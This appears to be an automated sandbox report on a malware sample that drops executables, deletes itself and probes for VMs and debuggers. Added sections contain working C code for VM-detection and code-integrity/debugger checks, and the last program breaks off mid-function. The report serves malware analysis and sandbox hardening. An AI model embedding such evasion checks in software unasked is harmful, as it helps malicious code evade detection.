                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\B096.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\C066.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Local\Temp\B096.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: Md0q201V1D.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Md0q201V1D.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Md0q201V1D.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Md0q201V1D.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Md0q201V1D.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Md0q201V1D.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Binary string: C:\vojos\fuw.pdb source: CBF0.exe, 0000001D.00000002.451970656.0000000000417000.00000002.00020000.sdmp, bhhudtb.10.dr
                Source: Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: EBBE.exe.10.dr
                Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: E64F.exe.10.dr
                Source: Binary string: dC:\fudijub.pdb` source: Md0q201V1D.exe
                Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: E64F.exe.10.dr
                Source: Binary string: C:\lewusukoviv.pdb source: C8FE.exe.10.dr
                Source: Binary string: C:\yut\pabebanejupo12 f.pdb` source: C066.exe.10.dr
                Source: Binary string: C:\fudijub.pdb source: Md0q201V1D.exe
                Source: Binary string: wntdll.pdbUGP source: CBF0.exe, 0000001D.00000002.461326417.000000006B521000.00000020.00020000.sdmp, 1105.tmp.29.dr
                Source: Binary string: wntdll.pdb source: CBF0.exe, 1105.tmp.29.dr
                Source: Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: EBBE.exe.10.dr
                Source: Binary string: C:\tosofom\yopuk.pdb source: CAC5.exe.10.dr
                Source: Binary string: C:\lewusukoviv.pdb` source: C8FE.exe.10.dr
                Source: Binary string: C:\yut\pabebanejupo12 f.pdb source: C066.exe.10.dr
                Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb` source: C295.exe.10.dr
                Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: F11E.exe.10.dr
                Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb source: C295.exe.10.dr

                Data Obfuscation:

                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Unpacked PE file: 29.2.CBF0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exe | Unpacked PE file: 33.2.EBBE.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                .NET source code contains potential unpacker
                Source: CD17.exe.10.dr, SimplePaint/FrmMain.cs | .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: C:\Users\user\AppData\Local\Temp\21.exe | Code function: 16_2_02D50F1A push ds; ret
                Source: C:\Users\user\AppData\Roaming\gbhudtb | Code function: 23_2_02EB6552 push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\B096.exe | Code function: 24_2_00A2D47C push esi; iretd
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402E54 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402E63 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402665 push cs; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_0040290C push eax; iretd
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402E16 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402DC0 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402DD8 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402DE8 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402DF1 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402E82 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402E85 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402D92 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402E95 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00401D9A pushad ; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_00402E9C push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Code function: 29_2_6B59D0D1 push ecx; ret
                Source: C:\Users\user\Desktop\Md0q201V1D.exe | Code function: 0_2_00426B90 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                Source: DEDC.exe.10.dr | Static PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]
                Source: Md0q201V1D.exe | Static PE information: section name: .pale
                Source: C066.exe.10.dr | Static PE information: section name: .ruxat
                Source: 21.exe.10.dr | Static PE information: section name: .pale
                Source: F1AC.exe.10.dr | Static PE information: section name: Cgw(O~.
                Source: C295.exe.10.dr | Static PE information: section name: .vuci
                Source: CAC5.exe.10.dr | Static PE information: section name: .xoj
                Source: CBF0.exe.10.dr | Static PE information: section name: .cipizi
                Source: CD17.exe.10.dr | Static PE information: real checksum: 0x0 should be: 0x4147a
                Source: BBE1.exe.10.dr | Static PE information: real checksum: 0x10f50 should be: 0x5be1
                Source: F11E.exe.10.dr | Static PE information: real checksum: 0x0 should be: 0x114b9d
                Source: DF3A.exe.10.dr | Static PE information: real checksum: 0x2bdee should be: 0x3529c
                Source: DEDC.exe.10.dr | Static PE information: real checksum: 0x87179 should be: 0x81f2a
                Source: B096.exe.10.dr | Static PE information: real checksum: 0x8ddc4 should be: 0x7fd66
                Source: initial sample | Static PE information: section name: .text entropy: 6.98974133443
                Source: initial sample | Static PE information: section name: .text entropy: 7.66210807275
                Source: initial sample | Static PE information: section name: .text entropy: 7.66469899227
                Source: initial sample | Static PE information: section name: .text entropy: 7.86113394582
                Source: initial sample | Static PE information: section name: .text entropy: 7.79620991915
                Source: initial sample | Static PE information: section name: .text entropy: 7.83179260502
                Source: initial sample | Static PE information: section name: .text entropy: 7.85713092672
                Source: initial sample | Static PE information: section name: .text entropy: 7.8779018043
                Source: initial sample | Static PE information: section name: .text entropy: 7.38549549306
                Source: initial sample | Static PE information: section name: .text entropy: 6.97994250456
                Source: initial sample | Static PE information: section name: .text entropy: 7.29655075024
                Source: initial sample | Static PE information: section name: .text entropy: 7.86107035261
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\bhhudtb
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\fehudtb
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\CBF0.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\C066.exe
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | File created: C:\Users\user\AppData\Local\Temp\1105.tmp
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\BBE1.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\F11E.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\F1AC.exe
                Source: C:\Users\user\AppData\Local\Temp\C066.exe | File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\CD17.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\C295.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\B096.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\C8FE.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\DF3A.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\DEDC.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\EBBE.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\E64F.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\D8D0.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\FD36.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\21.exe
                Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\CAC5.exe

                Hooking and other Techniques for Hiding and Protection:

                DLL reload attack detected
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
                Deletes itself after installation
                Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\md0q201v1d.exe
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\gbhudtb:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Local\Temp\B096.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                Yara detected AntiVM3
                Source: Yara match | File source: Process Memory Space: B096.exe PID: 6404, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: DF3A.exe PID: 5464, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: Md0q201V1D.exe, 00000003.00000002.338184490.00000000006AB000.00000004.00000020.sdmp, 21.exe, 00000013.00000002.400887733.0000000001F60000.00000004.00000001.sdmp, CBF0.exe, 0000001D.00000002.454053510.000000000323E000.00000004.00000020.sdmp | Binary or memory string: ASWHOOK
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLLUSER
                Checks if the current machine is a virtual machine (disk enumeration)Show sources
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Renames NTDLL to bypass HIPSShow sources
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeFile opened: C:\Windows\SysWOW64\ntdll.dll
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeFile opened: C:\Windows\SysWOW64\ntdll.dll
                Source: C:\Users\user\AppData\Local\Temp\B096.exe TID: 4200Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\C066.exe TID: 7772Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\B096.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 571
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F11E.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1AC.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CD17.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C295.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C8FE.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DEDC.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D8D0.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E64F.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FD36.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CAC5.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B576B90 rdtsc
                Source: C:\Users\user\AppData\Local\Temp\B096.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
                Source: explorer.exe, 0000000A.00000000.302532259.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                Source: explorer.exe, 0000000A.00000000.313810592.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000000A.00000000.333031309.000000000EF11000.00000004.00000001.sdmpBinary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
                Source: explorer.exe, 0000000A.00000000.313810592.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                Source: C:\Users\user\Desktop\Md0q201V1D.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Md0q201V1D.exeSystem information queried: ModuleInformation
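The repeated enumeration of HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI, together with the VMware, VBox and QEMU strings found in process memory, is the sample's disk-based VM check: hypervisors leak their vendor and product names into the SCSI device IDs, and a stealer that finds them simply never runs its payload. The C program below is an added example, not code from this report or from the sample. On Windows it enumerates the same registry key through the Registry API; on any platform it runs the matching logic over device-ID strings. The two VMware IDs in SAMPLE_IDS are the ones quoted in the report above; the Samsung ID and the marker list are constructed for the example and are assumptions, not something the report states.

```c
/* Added example, not code from the sandbox report or the sample: the
 * disk-enumeration VM check reported above. On Windows it walks
 * HKLM\SYSTEM\ControlSet001\Enum\SCSI as the sample does; on any platform the
 * matching logic runs over SCSI device-ID strings. SAMPLE_IDS holds the two
 * VMware IDs quoted in the report plus one constructed physical-disk ID. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Vendor/product markers hypervisors leave in SCSI device IDs. "VIRTUAL" also
 * matches Microsoft's mounted-VHD disks on real hardware, so treat a single
 * hit as a hint, not proof. Assumption: this marker list is illustrative. */
static const char *const VM_MARKERS[] = {
    "VMWARE", "VBOX", "VIRTUALBOX", "QEMU", "XEN", "VIRTUAL", NULL
};

const char *const SAMPLE_IDS[] = {
    "SCSI\\Disk&Ven_VMware&Prod_Virtual_disk\\5&1ec51bf7&0&000000",        /* from the report */
    "SCSI\\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\\5&280b647&0&000000", /* from the report */
    "SCSI\\Disk&Ven_Samsung&Prod_SSD_870_EVO\\4&2a1b3c4d&0&000000",       /* constructed, physical */
};
const size_t SAMPLE_COUNT = sizeof SAMPLE_IDS / sizeof SAMPLE_IDS[0];

/* Case-insensitive substring search; strcasestr is not in ISO C. */
static const char *find_nocase(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               toupper((unsigned char)hay[i]) == toupper((unsigned char)needle[i]))
            i++;
        if (i == n) return hay;
    }
    return NULL;
}

/* Returns the first marker found in device_id, or NULL when none matches. */
const char *vm_marker_in(const char *device_id) {
    for (size_t i = 0; VM_MARKERS[i]; i++)
        if (find_nocase(device_id, VM_MARKERS[i])) return VM_MARKERS[i];
    return NULL;
}

int device_id_is_vm(const char *device_id) { return vm_marker_in(device_id) != NULL; }

/* Number of IDs in the list that carry a hypervisor marker. */
int count_vm_devices(const char *const *ids, size_t n) {
    int hits = 0;
    for (size_t i = 0; i < n; i++) hits += device_id_is_vm(ids[i]);
    return hits;
}

#ifdef _WIN32
#include <windows.h>
/* The live check: enumerate the device-ID subkeys of the SCSI enumeration key.
 * The sample hard-codes ControlSet001; CurrentControlSet is the usual alias.
 * Returns the number of VM-looking devices, or -1 if the key cannot be opened. */
int count_vm_devices_in_registry(void) {
    HKEY hk;
    int hits = 0;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Enum\\SCSI",
                      0, KEY_READ, &hk) != ERROR_SUCCESS)
        return -1;
    for (DWORD idx = 0;; idx++) {
        char name[256];
        DWORD len = sizeof name;
        if (RegEnumKeyExA(hk, idx, name, &len, NULL, NULL, NULL, NULL) != ERROR_SUCCESS)
            break;
        if (device_id_is_vm(name)) hits++;
    }
    RegCloseKey(hk);
    return hits;
}
#endif

int main(void) {
    for (size_t i = 0; i < SAMPLE_COUNT; i++) {
        const char *m = vm_marker_in(SAMPLE_IDS[i]);
        printf("%-70s -> %s\n", SAMPLE_IDS[i], m ? m : "no marker");
    }
#ifdef _WIN32
    printf("registry: %d VM-looking SCSI devices\n", count_vm_devices_in_registry());
#endif
    return 0;
}
```

Run it on a sandbox image before detonating samples of this family: every hit is a device ID that has to be renamed (VMware's and VirtualBox's disk and CD-ROM descriptors are configurable at the VM level) or the payload stays dormant, exactly as the "Dropped PE file which has not been started" entries above suggest. Note that the sample reads ControlSet001 by name rather than CurrentControlSet, so confirm which control set HKLM\SYSTEM\Select\Current points to before trusting edits made only under CurrentControlSet.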

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\Md0q201V1D.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\21.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\gbhudtb | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe | System information queried: CodeIntegrityInformation
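Two probes account for the evidence under this heading. The CodeIntegrityInformation query asks the kernel whether code integrity is enforced and whether test-signing or kernel debug mode is on, which is how a sample notices an unsigned monitoring driver or an attached kernel debugger; the many fs:[00000030h] loads in CBF0.exe are reads of the PEB through the TEB, where PEB->BeingDebugged sits. The C program below is an added example, not code from this report or the sample. The class number 103 and the option bits (ENABLED 0x01, TESTSIGN 0x02, DEBUGMODE_ENABLED 0x80) are the values from the Windows DDK headers; the "analysis box" policy in ci_looks_like_analysis_box is an assumption about how a sample reads the bitmask, not something the report states. The live Windows calls compile only under _WIN32; the bitmask interpretation runs anywhere over constructed values.

```c
/* Added example, not code from the sandbox report or the sample: the two
 * probes behind the evidence under this heading. The bitmask interpretation
 * (ci_looks_like_analysis_box, ci_verdict) is portable and runs over
 * constructed values; the Windows-only part issues the real
 * NtQuerySystemInformation(SystemCodeIntegrityInformation) call and reads
 * PEB->BeingDebugged, the byte the fs:[00000030h] loads in this section reach. */
#include <stdio.h>
#include <string.h>

/* Class number and option bits as defined in the Windows DDK headers. */
#define SYSTEM_CODEINTEGRITY_INFORMATION_CLASS   103
#define CODEINTEGRITY_OPTION_ENABLED             0x01UL
#define CODEINTEGRITY_OPTION_TESTSIGN            0x02UL
#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED   0x80UL

typedef struct {
    unsigned long Length;               /* must be set to sizeof before the call */
    unsigned long CodeIntegrityOptions; /* bitmask filled in by the kernel */
} CI_INFO;

/* Assumed policy: a production box has code integrity enabled and neither
 * test-signing nor kernel debug mode. Anything else is what a sample treats
 * as an analysis rig (kernel debugger, unsigned or test-signed driver). */
int ci_looks_like_analysis_box(unsigned long options) {
    if (!(options & CODEINTEGRITY_OPTION_ENABLED)) return 1;
    if (options & (CODEINTEGRITY_OPTION_TESTSIGN | CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED)) return 1;
    return 0;
}

/* Human-readable reason, for a log line or a sandbox self-check. */
const char *ci_verdict(unsigned long options) {
    if (!(options & CODEINTEGRITY_OPTION_ENABLED)) return "code integrity disabled";
    if (options & CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED) return "kernel debug mode";
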